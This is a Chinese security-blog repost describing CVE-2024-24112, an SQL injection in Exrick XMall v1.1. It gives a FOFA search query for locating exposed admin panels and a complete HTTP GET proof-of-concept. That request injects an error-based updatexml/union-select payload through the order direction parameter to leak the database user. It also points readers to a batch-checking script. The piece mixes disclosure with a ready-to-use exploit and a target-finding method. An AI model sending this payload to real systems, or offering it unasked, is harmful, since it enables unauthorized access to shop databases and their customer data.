漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

admin 2024年2月21日22:45:29评论25 views字数 952阅读3分10秒阅读模式

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。

一:漏洞描述

Exrick XMall 是一个开源的电商平台系统,基于 Spring Boot + Vue 开发而成。它提供了一套完整的电商解决方案,包括前后端分离、商品管理、订单管理、用户管理、权限管理、支付接口集成等功能模块。该产品存在SQL注入漏洞。

二:漏洞影响版本

Exrick XMall v1.1版本

三:网络空间测绘查询

fofa:app="XMall-后台管理系统"

漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

四:漏洞复现

POC:

GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1Host: Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7Connection: close

漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

五:批量检测 

漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

关注【Amica安全攻防】公众号,回复关键字python获取批量验证脚本

原文始发于微信公众号(Amica安全攻防):漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日22:45:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-Exrick XMall 开源商城 SQL注入漏洞(CVE-2024-24112)http://cn-sec.com/archives/2508837.html

发表评论

匿名网友 填写信息